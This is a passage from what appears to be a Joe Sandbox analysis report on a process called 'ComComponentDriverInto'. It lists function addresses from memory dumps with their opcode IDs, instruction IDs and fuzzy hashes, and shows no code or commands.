                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1be95f472f23117a29d79775ad014c345559e30fe6f5d25ef3ade0960a02bfc1
                                                            • Instruction ID: f413cc3cf1417a9c404cc181d35902bb802ef0360f628f35f570a09fd7cfa3cf
                                                            • Opcode Fuzzy Hash: 1be95f472f23117a29d79775ad014c345559e30fe6f5d25ef3ade0960a02bfc1
                                                            • Instruction Fuzzy Hash: C4119932F0AA6E5FF7B481A54C291BD26D8EF55340F11083AF00AD72F2DD497E068741
                                                            Function 00007FFD9BEBEDD0 Relevance: .1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a1a86c987726070e4ece48faf0c1e00d2a67ee874449197ef6c5bc9e389f7c94
                                                            • Instruction ID: eb363ab39de0edf9576d465cc4390ad91b5cc983f92836c7f1d7a046e81ee6f7
                                                            • Opcode Fuzzy Hash: a1a86c987726070e4ece48faf0c1e00d2a67ee874449197ef6c5bc9e389f7c94
                                                            • Instruction Fuzzy Hash: 4B112B31B1991E4FD7A4EB6594658F97394FF58315F00063AE04EC75E3CE25F9458B80
                                                            Function 00007FFD9BEB367C Relevance: .1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cbef46a9035930dcd7f09e81a86c3690911faba0c247e33da72f7c59cc6694ff
                                                            • Instruction ID: a3915ae0c6786d93a3ad118263c22978e05b9a13524195977702eaa8a41521aa
                                                            • Opcode Fuzzy Hash: cbef46a9035930dcd7f09e81a86c3690911faba0c247e33da72f7c59cc6694ff
                                                            • Instruction Fuzzy Hash: 7B11A030B0961D8FD798DB58D8AAAB9B3E1FF49315B01027FD04EC76A2CA216941CB40
                                                            Function 00007FFD9BEB985B Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 08ec702125941d6dbc5e26d81c60dddde6a84965c8301e98df51942eb585428e
                                                            • Instruction ID: b64582cba801cd1da7922d05b2276577227b37d391bc6ef846062572e889dc43
                                                            • Opcode Fuzzy Hash: 08ec702125941d6dbc5e26d81c60dddde6a84965c8301e98df51942eb585428e
                                                            • Instruction Fuzzy Hash: B9114C32B19A1E4FD768AF6494244F97390FF48358B40163BD00ECB1D3CE29B6058790
                                                            Function 00007FFD9BEBEC4E Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f8b09714dcfd496007a9a31245a75c639c057ad61c6928dc3517b6fa7f48c110
                                                            • Instruction ID: 93081b28afd2403940e162cc7ed7e9741c7e1bbaf112177542eac50e37583fa2
                                                            • Opcode Fuzzy Hash: f8b09714dcfd496007a9a31245a75c639c057ad61c6928dc3517b6fa7f48c110
                                                            • Instruction Fuzzy Hash: 8811883130A51B8FE7699A58D8646F53394FF54350F01093BE90DCB6E2CF26AA40CB80
                                                            Function 00007FFD9BEB96CE Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4cd05331f94a1e1e8c59ce1e8e2ce074f0114a6e9d481297c4d93b2db836d8dd
                                                            • Instruction ID: e748a92a08083dc31fc581bd3c6dc05c118c09c7d37b0c206a8bf632b3f74fef
                                                            • Opcode Fuzzy Hash: 4cd05331f94a1e1e8c59ce1e8e2ce074f0114a6e9d481297c4d93b2db836d8dd
                                                            • Instruction Fuzzy Hash: 11116B3170A51F8FE7199E48D8686F93394FF59365F11013BD819C72E2CF26AA40CB80
                                                            Function 00007FFD9BECB2CE Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e63b58d50fb322effcec832c096d00d61797c8cac360e4e888badbddb950a75e
                                                            • Instruction ID: 26df5b05344b38b3904565e75fc944e3b80e688c07315c076b717b5c87d4ac0b
                                                            • Opcode Fuzzy Hash: e63b58d50fb322effcec832c096d00d61797c8cac360e4e888badbddb950a75e
                                                            • Instruction Fuzzy Hash: AB119130B0C71C8FDB68DB5CD8457A9B7E1EB98321F2082AAD04D93256CA75A9468FC1
                                                            Function 00007FFD9BEB469E Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6d9950320b42d718dd8d787103fc3e2f147144281ab18c2cc14382ac61b2c384
                                                            • Instruction ID: a84ff919401c043cdc680d960f1d1a5efddc55d766050e3636d7d091f9bb9bcb
                                                            • Opcode Fuzzy Hash: 6d9950320b42d718dd8d787103fc3e2f147144281ab18c2cc14382ac61b2c384
                                                            • Instruction Fuzzy Hash: E311483270A51B8FE7199E98E4646F933A4FF55355F01013FE909CB2E2CE35A640CB80
                                                            Function 00007FFD9BAB4B41 Relevance: .1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1fc56cbc17853a684d18b280f06a96486d9cb743d013b39c347045833957b540
                                                            • Instruction ID: 13dd1438de8a28eba20f913a63932893313d13c9ce96384a0c7787dbc3363a22
                                                            • Opcode Fuzzy Hash: 1fc56cbc17853a684d18b280f06a96486d9cb743d013b39c347045833957b540
                                                            • Instruction Fuzzy Hash: 3911C620F0D51D4BE7B4E75898666B87390EF48700F5101B9D86DC32F2EE68AA404E85
                                                            Function 00007FFD9BAB2AFA Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aaa86e1a9641e97b7a1fcccc4fab8e90eda8cbdd0f29ae7670ae56a84d863cd5
                                                            • Instruction ID: 3a79ff705472360a2d81e7b004789b27c2009704c9b91e7db05ccf9681d7b94c
                                                            • Opcode Fuzzy Hash: aaa86e1a9641e97b7a1fcccc4fab8e90eda8cbdd0f29ae7670ae56a84d863cd5
                                                            • Instruction Fuzzy Hash: A611AD31A18A2D8FDB64DF44C454BA9B7A1FB64311F1541BEC44EE72A0CAB5AEC5CF40
                                                            Function 00007FFD9BAB108D Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cd5afc3aa5e7ff51895ac6feae5197ca38f3c8e52363692b5e318b40ca75c02d
                                                            • Instruction ID: 664c71e4fcfaf7feb0ecc17dc073c872d97a1738ede89307ed46fe94a5e181bf
                                                            • Opcode Fuzzy Hash: cd5afc3aa5e7ff51895ac6feae5197ca38f3c8e52363692b5e318b40ca75c02d
                                                            • Instruction Fuzzy Hash: 71012B1194E6D51FE76957B44C719F13F90CF97260B0A01FAD095CB1F3C88D18868351
                                                            Function 00007FFD9BEB3D09 Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a6a3c7b2e450266e653ba658bcec341a6f46c8faa41dde688be4a7b57956d410
                                                            • Instruction ID: 75398c0f2c2b1b50ee5952a50218c0d6c4bc6406faa51866404e0db057ff5638
                                                            • Opcode Fuzzy Hash: a6a3c7b2e450266e653ba658bcec341a6f46c8faa41dde688be4a7b57956d410
                                                            • Instruction Fuzzy Hash: 0E01D231F0EA5D4FEB5AEBA8A8625FCB7A0FF49314F05007AD049C72E3CD2969028740
                                                            Function 00007FFD9BAB0C38 Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d5a6406267626cab8f21fa4dc55dd41a691b671ce849a721bf214a9a8dfec017
                                                            • Instruction ID: e7ae1917cc083348f81384040c94eeea21c39557a79049dc68b483edc9dd7d8e
                                                            • Opcode Fuzzy Hash: d5a6406267626cab8f21fa4dc55dd41a691b671ce849a721bf214a9a8dfec017
                                                            • Instruction Fuzzy Hash: FE112531B0E25C8FE722EBA888601EC7FB0EF52310F0645B3C054DB2A2EA3456058B84
                                                            Function 00007FFD9BEBC614 Relevance: .1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0297a6b559892da61f372b212205d92420677e2270a5225c13afc6dfb663a4cd
                                                            • Instruction ID: 9fd9f957b1759aa8b63e5f5097f587f1fc747217f6599b9cb21fb85bc6f2f4be
                                                            • Opcode Fuzzy Hash: 0297a6b559892da61f372b212205d92420677e2270a5225c13afc6dfb663a4cd
                                                            • Instruction Fuzzy Hash: 4011F570E1982EDFCB98DB89D8A09ECBBB1FF58700F101179D00AE7295DA356901CB54
                                                            Function 00007FFD9BAB0C40 Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4b25574912ac50aac02d52df2ab31defa4e348b481661347445f2ec88d16a7ec
                                                            • Instruction ID: 9264c6940158b9b4b93492f56267ad340d7320cd2630717c083da1b31a1678fc
                                                            • Opcode Fuzzy Hash: 4b25574912ac50aac02d52df2ab31defa4e348b481661347445f2ec88d16a7ec
                                                            • Instruction Fuzzy Hash: 6301C431A0E29C8FE722EBA888601DD7FB0EF52310F1545B7D054DB2A2DA345645CB84
                                                            Function 00007FFD9BEB6FED Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a5ea25ac2243dbf0f16f4f0e053fb67f6668ebb5f704dc3b0d343c83aef49e27
                                                            • Instruction ID: adcd9807596fb3a205343225d6b67d2003034027442cc9d750afca44a674f769
                                                            • Opcode Fuzzy Hash: a5ea25ac2243dbf0f16f4f0e053fb67f6668ebb5f704dc3b0d343c83aef49e27
                                                            • Instruction Fuzzy Hash: FFF0CD3554E2D58FC3129B74CC29991BFE0EF5721070A82EED0CACB8B3C61D8986C702
                                                            Function 00007FFD9BEBCE39 Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8a0abcbc7e4a762e87390733b7e4ca0f8301c5eca036628d0db1b5a3d4d35046
                                                            • Instruction ID: d4a4dc251ea6361614b263661caa59a3af8cbc0ffb6bd15c12eb5c677fbe57da
                                                            • Opcode Fuzzy Hash: 8a0abcbc7e4a762e87390733b7e4ca0f8301c5eca036628d0db1b5a3d4d35046
                                                            • Instruction Fuzzy Hash: 8301B162F1F0BACAF23891D6187117C64495F85760F1605B7E40E862F6DC0AAB601BC2
                                                            Function 00007FFD9BAB0C48 Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 237d2095e4a8d045cada6051c9d3678363244f2d9b9236ee170a1ee0b1485c33
                                                            • Instruction ID: b613afde3cca4ff5402d9d60037d6cbf6102abb1e5f38aa4366458dd87cd1717
                                                            • Opcode Fuzzy Hash: 237d2095e4a8d045cada6051c9d3678363244f2d9b9236ee170a1ee0b1485c33
                                                            • Instruction Fuzzy Hash: F001B131A0E28C8FE722EBA8C8601DD7FB0EF56310F1541E7D054DB2A2EA346644CB80
                                                            Function 00007FFD9BEB2EA2 Relevance: .0, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: be087b9e23df6c629787d98359de25b6ab1f365047438be0d688755cffbf8b71
                                                            • Instruction ID: 5c226a0418e910e24604cb09bb2350382ec4f306a4dd7b46ee58037adc5cf4a8
                                                            • Opcode Fuzzy Hash: be087b9e23df6c629787d98359de25b6ab1f365047438be0d688755cffbf8b71
                                                            • Instruction Fuzzy Hash: 83F04F3184F2C99FD7139BF198655E53FA8AF42214B1A00E6D4458A0A2C9696646C761
                                                            Function 00007FFD9BAB4B84 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ed99aa44a632927bf6e35c6446f32d213e0305bad0eba24e0d756e091ec0a55f
                                                            • Instruction ID: 293f157115848d6b1a8db626db3cc3a22bcc643fa7996e4ee8403c6781cba9f4
                                                            • Opcode Fuzzy Hash: ed99aa44a632927bf6e35c6446f32d213e0305bad0eba24e0d756e091ec0a55f
                                                            • Instruction Fuzzy Hash: 7C018630E0942E4AEBB4EB84D8657F873A0FF54300F0101BDC85DD35B1DEB86A818E05
                                                            Function 00007FFD9BEBD432 Relevance: .0, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 69e2e747d93961251e7ccdb3a4e4423b274c6548b46b423e738fc8f6759a8945
                                                            • Instruction ID: ac68a09abdb280501e0611511d022e8981e9de5a2e41dbc21139ca50c3b41a07
                                                            • Opcode Fuzzy Hash: 69e2e747d93961251e7ccdb3a4e4423b274c6548b46b423e738fc8f6759a8945
                                                            • Instruction Fuzzy Hash: 89F0C23184F2C99FE3268BB088615E53FA8EF43214B1541F6E495870B2C62D260ACB61
                                                            Function 00007FFD9BAB0C50 Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d085e641c339e700f2b01dbce1082692dd703bf0180ad29ca38c04b2d24a9c8a
                                                            • Instruction ID: f1f6b5f0bea72529e74645c3e6b97c1e95830d346f6c43d45cbd6ec7a8c34b46
                                                            • Opcode Fuzzy Hash: d085e641c339e700f2b01dbce1082692dd703bf0180ad29ca38c04b2d24a9c8a
                                                            • Instruction Fuzzy Hash: 2F01A230E0E38D8FE721EBA488641DD7FB0EF56304F1541E7D054DB2A6EA785644CB81
                                                            Function 00007FFD9BEBD0A4 Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b478cc51dee264756a4b5590519db4d53cff8bd3469df9ee5520a704209d9b2a
                                                            • Instruction ID: 55351b7eb0bed98331b886dcf1469cf3f993859e22bf7d097cdd5d1666e87ea9
                                                            • Opcode Fuzzy Hash: b478cc51dee264756a4b5590519db4d53cff8bd3469df9ee5520a704209d9b2a
                                                            • Instruction Fuzzy Hash: D601F470D0E55D4EEFA8DB58886176877F6FF59350F0445F9D04DD7292DA3529808F01
                                                            Function 00007FFD9BEB2B63 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                            • Instruction ID: 8c340b560c98952a8dc23f6ac432cdafdc51728de933af64f772f321baadb011
                                                            • Opcode Fuzzy Hash: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                            • Instruction Fuzzy Hash: 14010074A1992D8FDFA9DF48C8A4BA8B7B1FB68301F1041D9800EE3250DB35AE84CF01
                                                            Function 00007FFD9BEB96A8 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a8752b38c7ec87a0941850a65f7c7d9742ea2cd7404660c66f77b00a50d6911c
                                                            • Instruction ID: a76a3b0434653ae1314dc357456d80101d89c9fc927767cac335e92c746d4db2
                                                            • Opcode Fuzzy Hash: a8752b38c7ec87a0941850a65f7c7d9742ea2cd7404660c66f77b00a50d6911c
                                                            • Instruction Fuzzy Hash: 38F0BE29B0F52F8EF7356A92953A1F92618AF15315F22103AD40E861F6CD1B6A019B91
                                                            Function 00007FFD9BAB4BBB Relevance: .0, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 52272e81ee654107e1d0777ee8ff2532bfd0e3d34d4778b7801a48937b26d3f8
                                                            • Instruction ID: 7b912324d0b77b1ad8fc9e6166398f05cda33476cd44db17db30ef216b26c059
                                                            • Opcode Fuzzy Hash: 52272e81ee654107e1d0777ee8ff2532bfd0e3d34d4778b7801a48937b26d3f8
                                                            • Instruction Fuzzy Hash: 73F0B430B0942D4AEAB4EB44E4667F83391EF54700F1141BDCC6DC32F2DD686E914E45
                                                            Function 00007FFD9BEBE12A Relevance: .0, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 340bc2f54455c81e5b7f27b2343438114b61f7b8775b9abfa8379cd13599cb74
                                                            • Instruction ID: 7631dd67d23a5bf326352a191bb7d420b41c7e60c98b812648cfac3d0b8f8094
                                                            • Opcode Fuzzy Hash: 340bc2f54455c81e5b7f27b2343438114b61f7b8775b9abfa8379cd13599cb74
                                                            • Instruction Fuzzy Hash: 2EF09622A0E3DA4FEBB29AA18C614A83BE4DF13310B2A09F6D0458B1E7D5556905DB51
                                                            Function 00007FFD9BAB0CBF Relevance: .0, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 797cd966720f09c880d0f0cd62502a5358af509de291591265f8baad5ae0bb87
                                                            • Instruction ID: 85b85154ed0cbe87ed92de24fef27d1a14924861042f66f55687917c1e3ee60a
                                                            • Opcode Fuzzy Hash: 797cd966720f09c880d0f0cd62502a5358af509de291591265f8baad5ae0bb87
                                                            • Instruction Fuzzy Hash: 60F0BE31B0920E8FF764DB95C4A47BC77A0AF61720F1082BAD019C22E6DBB866848F44
                                                            Function 00007FFD9BAB10C0 Relevance: .0, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 491ba70b5800a447cc54f2b27e9bb94f7f36baebd31f0b97071cf986e25053d2
                                                            • Instruction ID: 2d6a0eb6bb2f46e0775d71a22d48ec03a2959e8498c6c612c4e6ad7d2636cd82
                                                            • Opcode Fuzzy Hash: 491ba70b5800a447cc54f2b27e9bb94f7f36baebd31f0b97071cf986e25053d2
                                                            • Instruction Fuzzy Hash: 59E02621F5C85906EB7CA67468B29B07380DB85324F0506B9D42AC22DACC491CC14281
                                                            Function 00007FFD9BEB1807 Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 290c53e76feac1baabaa3d6b6a0b709820f13e3729d4878028c39a873c13b248
                                                            • Instruction ID: 0fe9b9aacbce7e40e85a4799617270b4f55ba30ddbc8f93a16b1ede0c90d8298
                                                            • Opcode Fuzzy Hash: 290c53e76feac1baabaa3d6b6a0b709820f13e3729d4878028c39a873c13b248
                                                            • Instruction Fuzzy Hash: 3FE0E532F1941E8AE7709641C4607B93356FFC0371F160239C00E871E0DE7A66458B81
                                                            Function 00007FFD9BEB04A8 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: acc5ab83101f31b1264e0e5bd22dd50b26b496943b088373ffbb0fd2d621c9f9
                                                            • Instruction ID: 8d958a5c69278547763ab8a57eeb90f916efa6219dc9210e17b3b36f16c586a3
